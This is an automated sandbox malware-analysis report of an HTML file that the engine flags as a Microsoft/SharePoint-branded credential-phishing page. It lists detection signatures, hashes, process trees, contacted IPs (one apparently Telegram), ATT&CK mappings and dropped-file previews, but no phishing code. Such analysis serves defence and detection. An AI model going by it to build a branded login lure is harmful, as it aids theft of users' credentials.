Edit tour

Windows Analysis Report
ScannedFileCopy8475.html

Overview

General Information

Sample Name:	ScannedFileCopy8475.html
Analysis ID:	831537
MD5:	9a580f2e9f88aad5f60b02d775596e37
SHA1:	f9b1a8953113077f96acb4264754e94964d14d43
SHA256:	f31f1852b141c2680ada8b4b977b6cf150efbda99a584e858a21b332452f2626

Detection

HTMLPhisher

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected HtmlPhish10

Multi AV Scanner detection for submitted file

HTML document with suspicious title

HTML document with suspicious name

Phishing site detected (based on image similarity)

Invalid 'forgot password' link found

HTML body contains low number of good links

Invalid T&C link found

None HTTPS page querying sensitive user data (password, username or email)

No HTML title found

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 6452 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Downloads\cmkLSRXxXD\ScannedFileCopy8475.html MD5: 7BC7B4AEDC055BB02BCB52710132E9E1)

chrome.exe (PID: 6636 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1892,i,4439744641306001984,1519793728001864979,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 7BC7B4AEDC055BB02BCB52710132E9E1)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
28499.0.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: ScannedFileCopy8475.html

Virustotal: Detection: 13%

Perma Link

Phishing

Yara detected HtmlPhish10

Source: Yara match

File source: 28499.0.pages.csv, type: HTML

Phishing site detected (based on image similarity)

Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	Matcher: Found strong image similarity, brand: Microsoft image: 28499.img.0.gfk.csv ED9C9EB0DCE17D752BEDEA6B5ACDA6D9
Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	Matcher: Found strong image similarity, brand: Microsoft image: 28499.img.0.gfk.csv 071B2B2BDAD25606
Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	Matcher: Found strong image similarity, brand: Microsoft image: 28499.img.0.gfk.csv ED9C9EB0DCE17D752BEDEA6B5ACDA6D9
Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	Matcher: Found strong image similarity, brand: Microsoft image: 28499.img.0.gfk.csv 071B2B2BDAD25606
Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	Matcher: Found strong image similarity, brand: Microsoft image: 28499.img.0.gfk.csv ED9C9EB0DCE17D752BEDEA6B5ACDA6D9
Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	Matcher: Found strong image similarity, brand: Microsoft image: 28499.img.0.gfk.csv 071B2B2BDAD25606
Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	Matcher: Found strong image similarity, brand: Microsoft image: 28499.img.0.gfk.csv ED9C9EB0DCE17D752BEDEA6B5ACDA6D9
Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	Matcher: Found strong image similarity, brand: Microsoft image: 28499.img.0.gfk.csv 071B2B2BDAD25606
Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	Matcher: Found strong image similarity, brand: Microsoft image: 28499.img.0.gfk.csv ED9C9EB0DCE17D752BEDEA6B5ACDA6D9
Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	Matcher: Found strong image similarity, brand: Microsoft image: 28499.img.0.gfk.csv 071B2B2BDAD25606
Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	Matcher: Found strong image similarity, brand: Microsoft image: 28499.img.0.gfk.csv ED9C9EB0DCE17D752BEDEA6B5ACDA6D9
Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	Matcher: Found strong image similarity, brand: Microsoft image: 28499.img.0.gfk.csv 071B2B2BDAD25606

Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	HTTP Parser: Invalid link: Forgot password?
Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	HTTP Parser: Invalid link: Forgot password?

Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	HTTP Parser: Number of links: 0
Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	HTTP Parser: Number of links: 0

Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	HTTP Parser: Invalid link: Terms of use
Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	HTTP Parser: Invalid link: Privacy & cookies
Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	HTTP Parser: Invalid link: Terms of use
Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	HTTP Parser: Invalid link: Privacy & cookies

Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	HTTP Parser: Has password / email / username input fields
Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	HTTP Parser: Has password / email / username input fields

Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	HTTP Parser: HTML title missing

Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	HTTP Parser: No <meta name="author".. found

Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	HTTP Parser: No <meta name="copyright".. found

Source: chrome.exe

Memory has grown: Private usage: 8MB later: 24MB

Source: unknown

DNS traffic detected: queries for: clients2.google.com

Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866

Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.224.254.73
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.32.24
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.32.24
Source: unknown	TCP traffic detected without corresponding DNS query: 20.224.254.73
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 34.117.59.81
Source: unknown	TCP traffic detected without corresponding DNS query: 34.117.59.81
Source: unknown	TCP traffic detected without corresponding DNS query: 34.117.59.81
Source: unknown	TCP traffic detected without corresponding DNS query: 34.117.59.81
Source: unknown	TCP traffic detected without corresponding DNS query: 34.117.59.81
Source: unknown	TCP traffic detected without corresponding DNS query: 34.117.59.81
Source: unknown	TCP traffic detected without corresponding DNS query: 34.117.59.81
Source: unknown	TCP traffic detected without corresponding DNS query: 34.117.59.81
Source: unknown	TCP traffic detected without corresponding DNS query: 34.117.59.81
Source: unknown	TCP traffic detected without corresponding DNS query: 34.117.59.81
Source: unknown	TCP traffic detected without corresponding DNS query: 34.117.59.81
Source: unknown	TCP traffic detected without corresponding DNS query: 149.154.167.220
Source: unknown	TCP traffic detected without corresponding DNS query: 149.154.167.220
Source: unknown	TCP traffic detected without corresponding DNS query: 149.154.167.220
Source: unknown	TCP traffic detected without corresponding DNS query: 149.154.167.220
Source: unknown	TCP traffic detected without corresponding DNS query: 149.154.167.220
Source: unknown	TCP traffic detected without corresponding DNS query: 149.154.167.220
Source: unknown	TCP traffic detected without corresponding DNS query: 149.154.167.220
Source: unknown	TCP traffic detected without corresponding DNS query: 149.154.167.220
Source: unknown	TCP traffic detected without corresponding DNS query: 149.154.167.220
Source: unknown	TCP traffic detected without corresponding DNS query: 149.154.167.220
Source: unknown	TCP traffic detected without corresponding DNS query: 34.117.59.81
Source: unknown	TCP traffic detected without corresponding DNS query: 34.117.59.81
Source: unknown	TCP traffic detected without corresponding DNS query: 34.117.59.81
Source: unknown	TCP traffic detected without corresponding DNS query: 34.117.59.81
Source: unknown	TCP traffic detected without corresponding DNS query: 34.117.59.81
Source: unknown	TCP traffic detected without corresponding DNS query: 34.117.59.81
Source: unknown	TCP traffic detected without corresponding DNS query: 34.117.59.81
Source: unknown	TCP traffic detected without corresponding DNS query: 34.117.59.81
Source: unknown	TCP traffic detected without corresponding DNS query: 149.154.167.220
Source: unknown	TCP traffic detected without corresponding DNS query: 149.154.167.220
Source: unknown	TCP traffic detected without corresponding DNS query: 149.154.167.220
Source: unknown	TCP traffic detected without corresponding DNS query: 149.154.167.220
Source: unknown	TCP traffic detected without corresponding DNS query: 149.154.167.220

System Summary

HTML document with suspicious title

Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html

Tab title: Sharepoint

HTML document with suspicious name

Source: Name includes: ScannedFileCopy8475.html

Initial sample: scanned

Source: ScannedFileCopy8475.html

Virustotal: Detection: 13%

Source: classification engine

Classification label: mal68.phis.winHTML@23/70@6/116

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Downloads\cmkLSRXxXD\ScannedFileCopy8475.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1892,i,4439744641306001984,1519793728001864979,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1892,i,4439744641306001984,1519793728001864979,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE

File Volume queried: C:\Windows\System32 FullSizeInformation

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Process Injection	OS Credential Dumping	1 System Information Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Extra Window Memory Injection	1 Extra Window Memory Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ScannedFileCopy8475.html	14%	Virustotal		Browse

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
accounts.google.com	142.250.185.109	true	false	high
cs837.wac.edgecastcdn.net	192.229.133.221	true	false	high
cs1227.wpc.alphacdn.net	192.229.221.185	true	false	unknown
www.google.com	142.250.185.68	true	false	high
upload.wikimedia.org	91.198.174.208	true	false	high
part-0017.t-0009.fdv2-t-msedge.net	13.107.237.45	true	false	unknown
clients.l.google.com	142.250.186.142	true	false	high
clients2.google.com	unknown	unknown	false	high
www.w3schools.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html	true		low

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.109	accounts.google.com	United States	15169	GOOGLEUS	false
142.250.185.228	unknown	United States	15169	GOOGLEUS	false
152.199.19.160	unknown	United States	15133	EDGECASTUS	false
20.189.173.2	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
2.16.241.4	unknown	European Union	20940	AKAMAI-ASN1EU	false
20.190.159.64	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
149.154.167.220	unknown	United Kingdom	62041	TELEGRAMRU	false
142.250.185.163	unknown	United States	15169	GOOGLEUS	false
2.19.85.129	unknown	European Union	20940	AKAMAI-ASN1EU	false
34.104.35.123	unknown	United States	15169	GOOGLEUS	false
20.224.254.73	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
184.30.21.171	unknown	United States	16625	AKAMAI-ASUS	false
34.117.59.81	unknown	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
91.198.174.208	upload.wikimedia.org	Netherlands	14907	WIKIMEDIAUS	false
20.190.159.73	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
2.19.84.107	unknown	European Union	20940	AKAMAI-ASN1EU	false
192.229.133.221	cs837.wac.edgecastcdn.net	United States	15133	EDGECASTUS	false
52.109.32.24	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
192.229.221.185	cs1227.wpc.alphacdn.net	United States	15133	EDGECASTUS	false
13.107.237.45	part-0017.t-0009.fdv2-t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
142.250.186.142	clients.l.google.com	United States	15169	GOOGLEUS	false
192.229.221.95	unknown	United States	15133	EDGECASTUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	831537
Start date and time:	2023-03-21 15:41:20 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	1
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Sample file name:	ScannedFileCopy8475.html
Detection:	MAL
Classification:	mal68.phis.winHTML@23/70@6/116
Cookbook Comments:	Found application associated with file extension: .html

Warnings

Exclude process from analysis (whitelisted): SIHClient.exe
Excluded IPs from analysis (whitelisted): 142.250.185.163, 34.104.35.123
Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: cs1227.wpc.alphacdn.net
VT rate limit hit for: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html
VT rate limit hit for: part-0017.t-0009.fdv2-t-msedge.net

Created / dropped Files

C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst

Download File

File Type:	data
Category:	dropped
Size (bytes):	12582
Entropy (8bit):	3.3663352620841924
Encrypted:	false
SSDEEP:
MD5:	D4723DB381C386E8CDFC08095E805DC8
SHA1:	A8EF4CAD168FE10767D768317CE8AE8B39D23A1E
SHA-256:	DA791FF776D329234D63DCEEC4C2E94EDAC460E382F5F2D5F789C32E9265C372
SHA-512:	622F96E3526D3E5E629EEDBF0057EF931A94598BCFD7510B3B3044FC115F32CAF05B59D035CDA224382B9674C465B6BD910259AF7C9D2428C81F9CF4CA674FF4
Malicious:	false
Reputation:	low
Preview:	.....AAAAAAA...A&AAA.d.A.A.A%ALAAA.AAAAAAA.6#.tA.ntA...A...6..LA..bA...A...A6#.A..bA...A.bbAb..A...A...A6!.A*.HA..bA.w.A..bA.w#A..bA.SAA.AbA.S.A.6?.AA.AAA..AAAAAAV.AA6AAA..AAbAAA..AA.AAA?A.A!AAAQA.AnAAA.A.A.AAA.A.A.AAA..AA]AAA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6.AV.AAwAAAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.A?.AA.AAA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.A..AA.AAAA6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.A..AA-AAAL6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.A?A.A.AAA.6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&6AAAAAAAAAAA.LQA.A.AAA.6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.6AAAAAAAAAAA.L.A.AZAAAX6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.6AAAAAAAAAAA.L.A.ApAAAA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAL.AAAAAAAAAAA.LcA.A~ALA.AwALA.AxA.A.A.A.A,ALA.AJA.AJALAwApA.A.A.A.AJA.A.A.ALA.A.A.A.A.A.A.A.ALA.A.AJA.A.A.ALAUA.A.A.A.A.ALA8A.A.A.A.A.A.A\|AKA.A.A.A.A.AQA.A.A.A.A.A.A.A.A\|AKA.A.A.AYApA:A.A.A.A.A.AxA.A.A.A.A,A.A.A.AYApA:A.A.A.A.A.A.AYA.A.A.A.A.A.AJA.A.A.A.AxA.A.A.A.A,A.A.A.A.AYA.A.A.A.A.A.A.A.A.AQA.A:A.

Chrome Cache Entry: 111

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1057
Entropy (8bit):	7.6851406288304105
Encrypted:	false
SSDEEP:
MD5:	ED9C9EB0DCE17D752BEDEA6B5ACDA6D9
SHA1:	ECA56C4904354EED5DA0DEBCD6BD66856AB4784D
SHA-256:	F664B8138C2DA6EC7565500A7CC839DA6372614A31DC04C5A2169A26B8D9767C
SHA-512:	3BFB696318DDB93540140DBCD4DBB32F129441E46EE752C6B7379624488533BA27CC7EFF3CAE444C1797CA6EECDF333EDAF443AC84CDEB037A890967091CF91C
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...l.................pHYs...........~.....IDATh..XMN.P..\.E......' ,.-.$'.H....s...1.vQ.......4.........-.<......{..\|.?.w[4....A.=h<>.......7..t.u..]A{..&...,..h.`D4.01]......H.&..C.w...@......a..3..H.aR.=.g.(.0.6...;Wl...X.X..G.Bf.....D4...K..p... ..hh.-b.R.Z....Z..zYQc}....u^..R.Dzm$..%c".....C.z.\&U9P..0.3s*..31..@...W..2....yG.....c)k.F....3.I!....2..F.....`%1.....-..U.s(.p..S.($/...}(.5.\"k.+.I.Q...cb....kt..o.`.........%L....;.J.[..b.xx)c,X7.....)..'.n..H=E<.B.].g.}f.o...........znJ.....Q$....7...#.&..g.D..X....F..~=...%IQ.........e.....>.R..............s..[.D\|l.n&..a06..d.5.5YGC..3N......<..Pt..\<{b...i.....)!.....8...0.t_.....8..T.......)G.-mzK....../..TDK..k..s"ch.0....i..`...`V..H.Q"...x......!.."..Q..%3O.L.....$....e.s.m..\|\|.......AD."...#.%b,'..r!.}c...X!2kCD6..iX.\@S..3Er....B...D...%.O...(._...-....{b......z........r.N..W2....L.1~-.J.?.l....?..q:..W.5&.....\|..>.B...G.oa.S.....1......Zo...q.....

Chrome Cache Entry: 112

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	513
Entropy (8bit):	4.720499940334011
Encrypted:	false
SSDEEP:
MD5:	A9CC2824EF3517B6C4160DCF8FF7D410
SHA1:	8DB9AEBAD84CA6E4225BFDD2458FF3821CC4F064
SHA-256:	34F9DB946E89F031A80DFCA7B16B2B686469C9886441261AE70A44DA1DFA2D58
SHA-512:	AA3DDAB0A1CFF9533F9A668ABA4FB5E3D75ED9F8AFF8A1CAA4C29F9126D85FF4529E82712C0119D2E81035D1CE1CC491FF9473384D211317D4D00E0E234AD97F
Malicious:	false
Reputation:	low
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><title>assets</title><path d="M18,11.578v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944.594.594L7.617,11.578Z" fill="#404040"/><path d="M10.944,7.056l.594.594L7.617,11.578H18v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944m0-.141-.071.07L5.929,11.929,5.858,12l.071.071,4.944,4.944.071.07.071-.07.594-.595.071-.07-.071-.071L7.858,12.522H18.1V11.478H7.858l3.751-3.757.071-.071-.071-.07-.594-.595-.071-.07Z" fill="#404040"/></svg>

Chrome Cache Entry: 113

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
Category:	downloaded
Size (bytes):	673
